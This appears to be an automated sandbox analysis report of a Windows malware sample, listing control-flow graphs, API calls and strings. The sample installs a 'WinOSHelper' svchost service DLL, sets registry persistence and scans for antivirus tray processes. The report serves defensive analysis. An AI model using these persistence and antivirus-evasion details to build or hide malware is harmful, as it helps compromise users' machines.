                                                            • API String ID: 2234911746-3182569296
                                                            • Opcode ID: b680d67cbf5071cb0b735b810101e5a47ff9fe07964522d809aff05d5cd04b6f
                                                            • Instruction ID: e4fe8673f7a4706a2f7e84f7f6a21af4db432274e921506ddd878a7b41fa8e3a
                                                            • Opcode Fuzzy Hash: b680d67cbf5071cb0b735b810101e5a47ff9fe07964522d809aff05d5cd04b6f
                                                            • Instruction Fuzzy Hash: 6C614D75D01615DBCF24CFA4C984AEEFBB0BF44315F24C6AAD605AB201C7709E81CB99

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 51 100011bb-10001219 call 1000106b 54 10001224-10001239 call 1000181e 51->54 55 1000121b-10001221 call 10006c31 51->55 60 10001244-10001267 OpenSCManagerA 54->60 61 1000123b-10001241 call 10006c31 54->61 55->54 63 10001280-10001287 60->63 64 10001269-1000127d call 10006c3d 60->64 61->60 67 100012f9-1000130c CloseServiceHandle 63->67 68 1000128d-100012dd CreateServiceA 63->68 64->63 71 10001325-10001338 CloseServiceHandle 67->71 72 1000130e-10001322 call 10006c3d 67->72 69 100012f6 68->69 70 100012df-100012f3 call 10006c3d 68->70 69->67 70->69 76 10001351-10001367 call 100010c7 71->76 77 1000133a-1000134e call 10006c3d 71->77 72->71 84 10001592-10001599 call 10001954 76->84 85 1000136d-10001374 call 10001954 76->85 77->76 92 100015a9 84->92 93 1000159f-100015a4 84->93 90 10001384 85->90 91 1000137a-1000137f 85->91 94 10001389-100013b4 call 1000106b 90->94 91->94 95 100015ae-100015d3 call 1000106b 92->95 93->95 100 100013b6-100013bc call 10006c31 94->100 101 100013bf-100013d5 call 10001ac1 94->101 102 100015d5-100015db call 10006c31 95->102 103 100015de-100015ec 95->103 100->101 114 100013e0-100013e9 101->114 115 100013d7-100013dd call 10006c31 101->115 102->103 105 100015f3-10001626 call 10007680 call 10001164 103->105 106 100015ee 103->106 127 10001631-1000165b call 100028b3 105->127 128 10001628-1000162e call 10006c31 105->128 106->105 116 100013f4-10001404 114->116 117 100013eb-100013f1 call 10006c31 114->117 115->114 121 10001406 116->121 122 1000140b-1000142f call 10007210 116->122 117->116 121->122 132 10001431 122->132 133 10001436-10001479 call 10007210 call 100025dd 122->133 137 10001666-1000166b 127->137 138 1000165d-10001663 call 10006c31 127->138 128->127 132->133 152 10001484-10001489 133->152 153 1000147b-10001481 call 10006c31 133->153 140 10001676-1000169f call 1000106b 137->140 141 1000166d-10001673 call 10006c31 137->141 138->137 150 100016a1-100016a7 call 10006c31 140->150 151 100016aa-100016bc 140->151 141->140 150->151 158 100016c3-1000170a call 10007680 call 100028b3 151->158 159 100016be 151->159 155 10001494-10001498 152->155 156 1000148b-10001491 call 10006c31 152->156 153->152 162 1000158d 155->162 163 1000149e-100014ac 155->163 156->155 174 10001715-1000171a 158->174 175 1000170c-10001712 call 10006c31 158->175 159->158 162->140 168 100014b3-100014e9 call 10007680 call 10001164 163->168 169 100014ae 163->169 184 100014f4-100014fd 168->184 185 100014eb-100014f1 call 10006c31 168->185 169->168 178 10001725-10001746 call 1000106b 174->178 179 1000171c-10001722 call 10006c31 174->179 175->174 194 10001751-10001761 178->194 195 10001748-1000174e call 10006c31 178->195 179->178 186 10001508-10001513 call 10001954 184->186 187 100014ff-10001505 call 10006c31 184->187 185->184 202 10001523 186->202 203 10001519-1000151e 186->203 187->186 196 10001763 194->196 197 10001768-100017a5 call 10007680 call 100028b3 194->197 195->194 196->197 209 100017aa-100017af 197->209 206 10001528-1000154d call 1000106b 202->206 203->206 213 10001558-10001578 call 100028b3 206->213 214 1000154f-10001555 call 10006c31 206->214 211 100017b1-100017b7 call 10006c31 209->211 212 100017ba-100017bf 209->212 211->212 217 100017c1-100017c7 call 10006c31 212->217 218 100017ca-100017cf 212->218 220 1000157d-10001582 213->220 214->213 217->218 223 100017d1-100017d7 call 10006c31 218->223 224 100017da-100017df 218->224 220->162 227 10001584-1000158a call 10006c31 220->227 223->224 228 100017e1-100017e7 call 10006c31 224->228 229 100017ea-100017ef 224->229 227->162 228->229 234 100017f1-100017f7 call 10006c31 229->234 235 100017fa-100017ff 229->235 234->235 239 10001801-10001807 call 10006c31 235->239 240 1000180a-1000180f 235->240 239->240 243 10001811-10001817 call 10006c31 240->243 244 1000181a-1000181d 240->244 243->244
                                                            APIs
                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 1000125C
                                                            • CreateServiceA.ADVAPI32(00000000,000F01FF,00000020,00000001,00000000,1000B226,00000000,1000B226,00000000,1000B226), ref: 100012D2
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 10001301
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 1000132D
                                                              • Part of subcall function 10001954: GetNativeSystemInfo.KERNELBASE(00000000), ref: 100019B4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandle$CreateInfoManagerNativeOpenSystem
                                                            • String ID: %SystemRoot%\System32\svchost.exe -k $Description$NetworkService$Parameters\$SOFTWARE\$SYSTEM\CurrentControlSet\Services\$ServiceDll$Wow6432Node\$\Microsoft\Windows NT\CurrentVersion\Svchost\
                                                            • API String ID: 4060035196-4177043049
                                                            • Opcode ID: 403055ad7c014e09a3b792161e097cc94ac7a9c6644ae19baceabcdb4d230123
                                                            • Instruction ID: cbd8f5018640b7ff211c506f908f4dff69b94d7d1605c845ec97f26270a8f3e7
                                                            • Opcode Fuzzy Hash: 403055ad7c014e09a3b792161e097cc94ac7a9c6644ae19baceabcdb4d230123
                                                            • Instruction Fuzzy Hash: 7FF147B1E00319ABFF00DFE49CC2FEE76B9EB18780F144024F645B6245EB75AA148B65

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 248 4010df-401143 call 401371 call 40107b 253 401145-40114b call 402150 248->253 254 40114e-401157 248->254 253->254 256 401162-40117e 254->256 257 401159-40115f call 402150 254->257 260 401180 256->260 261 401185-40119a call 402550 256->261 257->256 260->261 265 4011a0-4011b3 LoadLibraryA 261->265 266 40120d-401257 call 4010d7 call 4024b0 OpenSCManagerA 261->266 268 4011b5-4011c9 call 402144 265->268 269 4011cc-4011d3 265->269 280 401270-401277 266->280 281 401259-40126d call 402144 266->281 268->269 269->266 271 4011d9-4011f1 GetProcAddress 269->271 274 4011f3-401207 call 402144 271->274 275 40120a 271->275 274->275 275->266 282 4012b6-4012ba 280->282 283 40127d-40129a OpenServiceA 280->283 281->280 287 4012c0-4012dd StartServiceA 282->287 288 401325-401338 CloseServiceHandle 282->288 285 4012b3 283->285 286 40129c-4012b0 call 402144 283->286 285->282 286->285 293 4012f6-40130c CloseServiceHandle 287->293 294 4012df-4012f3 call 402144 287->294 290 401351-401361 288->290 291 40133a-40134e call 402144 288->291 301 401363-401369 call 402150 290->301 302 40136c-401370 290->302 291->290 293->288 299 40130e-401322 call 402144 293->299 294->293 299->288 301->302
                                                            APIs
                                                            • LoadLibraryA.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 004011A8
                                                            • GetProcAddress.KERNEL32(00000000,InsertSvc), ref: 004011E6
                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 0040124C
                                                            • OpenServiceA.ADVAPI32(00000000,WinOSHelper,00000030), ref: 0040128F
                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 004012D2
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00401301
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040132D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleOpen$AddressLibraryLoadManagerProcStart
                                                            • String ID: InsertSvc$WinOSHelper$winoshelper.dll
                                                            • API String ID: 1886654264-1351197553
                                                            • Opcode ID: 74657d871dfecc05a695f0546ec55db51ffde7d4bd0b76de222f37e82e57020d
                                                            • Instruction ID: 669fd7b6444dc58bb1a1f197b6f4cbcbee2440849ac611bdd7474ba0911290ae
                                                            • Opcode Fuzzy Hash: 74657d871dfecc05a695f0546ec55db51ffde7d4bd0b76de222f37e82e57020d
                                                            • Instruction Fuzzy Hash: 18515370E40305ABEB11AFE1DD4BBAFBA74AB09705F10407AF704BE2D1D6B94650CB99

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 416 1000626a-10006290 call 10006c37 419 10006295-100062bd call 10006c37 416->419 422 100062bf-100062cd 419->422 423 100062d8-100062ec 422->423 424 100062cf-100062d5 call 10006c31 422->424 426 100062f7-1000630b 423->426 427 100062ee-100062f4 call 10006c31 423->427 424->423 430 10006316-1000633c call 10006649 426->430 431 1000630d-10006313 call 10006c31 426->431 427->426 437 10006347-1000634b 430->437 438 1000633e-10006344 call 10006c31 430->438 431->430 440 10006351-10006371 call 10006649 437->440 441 100063f7 437->441 438->437 452 10006373-10006379 call 10006c31 440->452 453 1000637c-10006380 440->453 444 100063fc-100063fe 441->444 445 10006404-10006412 444->445 446 10006428-10006436 444->446 448 10006414-1000641a call 10006c31 445->448 449 1000641d-10006423 445->449 450 10006441-10006442 446->450 451 10006438-1000643e call 10006c31 446->451 448->449 455 10006447-10006460 call 10004f7b 449->455 450->455 451->450 452->453 453->441 458 10006386-100063a6 call 10006649 453->458 468 10006462-10006476 call 10006c3d 455->468 469 10006479-1000648a 455->469 466 100063b1-100063b5 458->466 467 100063a8-100063ae call 10006c31 458->467 466->441 473 100063bb-100063ce call 10006649 466->473 467->466 468->469 470 100064a1-100064a9 469->470 471 1000648c-1000649f call 10001000 call 10006c37 469->471 477 100064b4-100064c9 call 10004f7b 470->477 478 100064ab-100064b1 call 10006c31 470->478 471->470 483 100063d3-100063db 473->483 493 100064e2-10006523 call 10007c60 call 10004f7b 477->493 494 100064cb-100064df call 10006c3d 477->494 478->477 487 100063e6-100063ea 483->487 488 100063dd-100063e3 call 10006c31 483->488 487->441 492 100063f0-100063f5 487->492 488->487 492->444 502 10006525-10006527 493->502 503 10006529-10006532 call 10006c37 493->503 494->493 504 10006535-10006544 502->504 503->504 507 1000657a-10006587 StartServiceCtrlDispatcherA 504->507 508 1000654a-10006567 504->508 510 100065a0-100065ad 507->510 511 10006589-1000659d call 10006c3d 507->511 508->507 509 10006569-10006575 508->509 509->508 512 100065b3-100065cb call 10004746 510->512 513 100065de-100065fd call 10006c31 510->513 511->510 512->513 520 100065cd-100065d9 512->520 522 10006610 513->522 523 100065ff 513->523 520->512 525 10006616-10006620 522->525 526 1000663c-10006648 call 10006c31 522->526 524 10006601-10006605 523->524 528 10006607-1000660a 524->528 529 1000660c-1000660e 524->529 530 10006622-10006628 call 10006c31 525->530 531 1000662b-1000663a call 10006c31 525->531 528->524 529->522 530->531 531->525 531->526
                                                            APIs
                                                            • StartServiceCtrlDispatcherA.ADVAPI32(00000000,?,?,?,?,00000001,00000001), ref: 1000657C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CtrlDispatcherServiceStart
                                                            • String ID: 360tray.exe$HipsTray.exe$NetworkService$QQPCTray.exe$WinOSHelper$kxetray.exe
                                                            • API String ID: 3789849863-1621434276
                                                            • Opcode ID: d2721d0caef0534c46c98eab3ca221fd1c2ad881137017ad7669971c088c00d3
                                                            • Instruction ID: ac47f5f7dbe1742c754a41b655fcb039278ec932899158b2cc72ca0c8d0e6276
                                                            • Opcode Fuzzy Hash: d2721d0caef0534c46c98eab3ca221fd1c2ad881137017ad7669971c088c00d3
                                                            • Instruction Fuzzy Hash: 45A1A3F5A003195FFB40CBA4DCC2B5E77E9EB1C394F244039E545EB34AEA75AA408B61

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 648 401e84-401eb4 649 401eba-401eca GetCurrentProcess 648->649 650 401eeb-401f08 OpenProcess 648->650 651 401ee3-401ee6 649->651 652 401ecc-401ee0 call 402144 649->652 653 401f21 650->653 654 401f0a-401f1e call 402144 650->654 656 401f24-401f28 651->656 652->651 653->656 654->653 660 401f38-401f5e LocalAlloc 656->660 661 401f2e-401f33 656->661 663 401f60-401f74 call 402144 660->663 664 401f77-401f7e 660->664 662 402094-402097 661->662 663->664 666 401f84-401fa6 NtQueryInformationProcess 664->666 667 402057-40206a CloseHandle 664->667 669 401fa8-401fbc call 402144 666->669 670 401fbf-401fc6 666->670 671 402083-40208f 667->671 672 40206c-402080 call 402144 667->672 669->670 674 401fd1-401fd9 call 40209a 670->674 675 401fcc 670->675 671->662 672->671 682 401fde-402028 call 40209a * 2 call 40142d call 4020ba 674->682 678 40202b-40203e LocalFree 675->678 678->667 681 402040-402054 call 402144 678->681 681->667 682->678
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,00401E70,00000000,00000000,00000000), ref: 00401EBF
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,?,00401E70,00000000,00000000,00000000), ref: 00401EFD
                                                            • LocalAlloc.KERNEL32(00000040,00000018,?,00401E70,00000000,00000000,00000000), ref: 00401F53
                                                            • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00000018), ref: 00401F9B
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,000000A8,00000000,000000A4,00000000,00000004,?,00401E70,00000000,00000000,00000000), ref: 00402033
                                                            • CloseHandle.KERNEL32(00000000,?,00401E70,00000000,00000000,00000000), ref: 0040205F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$Local$AllocCloseCurrentFreeHandleInformationOpenQuery
                                                            • String ID:
                                                            • API String ID: 1303139876-0
                                                            • Opcode ID: dad92bccf0bc3b8efc0e160a13481386a2c4dc6f0d1eb82929329f6b117c8ed3
                                                            • Instruction ID: 1142c58092ec319262c9f6ef5c5fa3d09cba10cfee31c3046b1cc0526491f4ba
                                                            • Opcode Fuzzy Hash: dad92bccf0bc3b8efc0e160a13481386a2c4dc6f0d1eb82929329f6b117c8ed3
                                                            • Instruction Fuzzy Hash: C0513F70D40309EBDB10AFA0D94A7AEBB70EF09705F104466F7057A2E0D7B94654DB9A

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,1000601A,00000000,00000000,00000000), ref: 10006069
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,?,1000601A,00000000,00000000,00000000), ref: 100060A7
                                                            • LocalAlloc.KERNEL32(00000040,00000018,?,1000601A,00000000,00000000,00000000), ref: 100060FD
                                                            • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00000018), ref: 10006145
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,000000A8,00000000,000000A4,00000000,00000004,?,1000601A,00000000,00000000,00000000), ref: 100061DD
                                                            • CloseHandle.KERNEL32(00000000,?,1000601A,00000000,00000000,00000000), ref: 10006209
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$Local$AllocCloseCurrentFreeHandleInformationOpenQuery
                                                            • String ID:
                                                            • API String ID: 1303139876-0
                                                            • Opcode ID: fe57c8f768a2e2fc0d72af9cc9b089ce98cfee3c8937f324e423347b320b006c
                                                            • Instruction ID: 6ca421a6893a22c17429558b8d83b426a8409489b52cb914f268299110d877c7
                                                            • Opcode Fuzzy Hash: fe57c8f768a2e2fc0d72af9cc9b089ce98cfee3c8937f324e423347b320b006c
                                                            • Instruction Fuzzy Hash: 7E514E74D40319EBEB00DFA0CC4ABAEBBB1EF09381F204465F6047A195D77566A4CB95

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 763 10006649-100066bf call 10006c37 * 2 CreateToolhelp32Snapshot 768 100066c1-100066d5 call 10006c3d 763->768 769 100066d8-100066df 763->769 768->769 771 100066e5-100066ea 769->771 772 100066ef-1000679c call 10006c37 Process32First 769->772 774 10006ae6-10006b07 call 10006c31 * 2 771->774 778 100067b5-10006835 call 10007080 772->778 779 1000679e-100067b2 call 10006c3d 772->779 787 10006846-1000684c 778->787 788 10006837 778->788 779->778 790 10006853-1000686b call 10006c31 787->790 791 1000684e 787->791 789 10006839-1000683d 788->789 792 10006844 789->792 793 1000683f-10006842 789->793 796 1000686e-10006872 790->796 791->790 792->787 793->789 797 10006ab0-10006ac3 FindCloseChangeNotification 796->797 798 10006878-100068b8 call 10007210 796->798 800 10006ac5-10006ad9 call 10006c3d 797->800 801 10006adc-10006ae1 797->801 804 100068ba 798->804 805 100068bf-100068ce 798->805 800->801 801->774 804->805 807 100068d0 805->807 808 100068d5-100068f0 call 10007ee0 805->808 807->808 811 100068f2-100068f8 call 10006c31 808->811 812 100068fb-100068ff 808->812 811->812 814 10006905-10006918 CloseHandle 812->814 815 1000693b-100069d9 call 10006c37 Process32Next 812->815 818 10006931-10006936 814->818 819 1000691a-1000692e call 10006c3d 814->819 823 100069f2-10006a72 call 10007080 815->823 824 100069db-100069ef call 10006c3d 815->824 818->774 819->818 829 10006a83-10006a89 823->829 830 10006a74 823->830 824->823 831 10006a90-10006aab call 10006c31 829->831 832 10006a8b 829->832 833 10006a76-10006a7a 830->833 831->796 832->831 835 10006a81 833->835 836 10006a7c-10006a7f 833->836 835->829 836->833
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 100066B4
                                                            • Process32First.KERNEL32(000000FF,00000000), ref: 10006791
                                                            • CloseHandle.KERNEL32(000000FF), ref: 1000690D
                                                            • Process32Next.KERNEL32(000000FF,00000000), ref: 100069CE
                                                            • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 10006AB8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseProcess32$ChangeCreateFindFirstHandleNextNotificationSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 1974561565-0
                                                            • Opcode ID: faf9dbc34456666b837048f35860a73c9e14378ab931202663125be9152aff0a
                                                            • Instruction ID: 638297937719c4a0aaac713da410950e3b13d01d6eb6846a9ff996d584ad0b1d
                                                            • Opcode Fuzzy Hash: faf9dbc34456666b837048f35860a73c9e14378ab931202663125be9152aff0a
                                                            • Instruction Fuzzy Hash: D6E17DF1A802569BFB00CF98DCC1B59B7E1EF59364F280434E506AB344E779B960CB62

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 308 100028b3-100028ea 309 100028f0 308->309 310 100028f7-10002906 call 10001eda 308->310 309->310 313 10002942-10002965 call 10001164 310->313 314 1000290c-10002913 310->314 324 10002970-10002971 313->324 325 10002967-1000296d call 10006c31 313->325 316 10002915-10002926 call 10006c37 314->316 317 10002928-1000292e 314->317 316->317 320 10002930-10002936 call 10006c31 317->320 321 10002939-1000293d 317->321 320->321 323 10002974-1000297b call 10001954 321->323 332 10002981-1000298c call 10002172 323->332 333 10002bac-10002bfd call 10007a60 RegOpenKeyExA 323->333 324->323 325->324 338 10002992-100029ef call 10007a60 RegOpenKeyExA 332->338 339 10002ba7 332->339 340 10002c16-10002c1d 333->340 341 10002bff-10002c13 call 10006c3d 333->341 351 100029f1-10002a05 call 10006c3d 338->351 352 10002a08-10002a0f 338->352 342 10002d91-10002d9f 339->342 340->342 343 10002c23-10002c8f call 10007a60 RegCreateKeyExA 340->343 341->340 353 10002da1-10002da7 call 10006c31 342->353 354 10002daa-10002dae 342->354 355 10002c91-10002ca5 call 10006c3d 343->355 356 10002ca8-10002caf 343->356 351->352 358 10002a15-10002a95 call 100022ec call 10007a60 RegCreateKeyExA 352->358 359 10002b9f-10002ba2 call 100024d0 352->359 353->354 355->356 363 10002d65-10002d78 RegCloseKey 356->363 364 10002cb5-10002cc1 356->364 381 10002a97-10002aab call 10006c3d 358->381 382 10002aae-10002ab5 358->382 359->339 363->342 369 10002d7a-10002d8e call 10006c3d 363->369 370 10002cc3 364->370 371 10002cc8-10002ce9 call 10007c50 364->371 369->342 370->371 379 10002ceb 371->379 380 10002cee-10002d0c RegSetValueExA 371->380 379->380 386 10002d25-10002d2c 380->386 387 10002d0e-10002d22 call 10006c3d 380->387 381->382 383 10002b6b-10002b86 call 100023de RegCloseKey 382->383 384 10002abb-10002ac7 382->384 383->359 399 10002b88-10002b9c call 10006c3d 383->399 389 10002ac9 384->389 390 10002ace-10002aef call 10007c50 384->390 391 10002d32 386->391 392 10002d39-10002d4c RegCloseKey 386->392 387->386 389->390 403 10002af1 390->403 404 10002af4-10002b12 RegSetValueExA 390->404 391->392 392->363 398 10002d4e-10002d62 call 10006c3d 392->398 398->363 399->359 403->404 407 10002b14-10002b28 call 10006c3d 404->407 408 10002b2b-10002b32 404->408 407->408 410 10002b38 408->410 411 10002b3f-10002b52 RegCloseKey 408->411 410->411 411->383 413 10002b54-10002b68 call 10006c3d 411->413 413->383
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(00000000,1000B226,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100029E4
                                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,10001656), ref: 10002A8A
                                                            • RegSetValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 10002B07
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 10002B47
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 10002B7B
                                                            • RegOpenKeyExA.ADVAPI32(00000000,1000B226,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 10002BF2
                                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,10001656), ref: 10002C84
                                                            • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 10002D01
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 10002D41
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 10002D6D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$CreateOpenValue
                                                            • String ID:
                                                            • API String ID: 678895439-0
                                                            • Opcode ID: cd96153686ed4c09cf270a96b81856773abf8c7a8fb4bd1d1da169016057a140
                                                            • Instruction ID: 250e689f5bc784c1e5c60d0ffd7112ea62c25d043d3bb47dc4e265f74afee092
                                                            • Opcode Fuzzy Hash: cd96153686ed4c09cf270a96b81856773abf8c7a8fb4bd1d1da169016057a140
                                                            • Instruction Fuzzy Hash: E7D13E70E40319ABFB00DFA0DC86FAEBBB5EB0D785F104025F605BA185D7B69A508B65

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
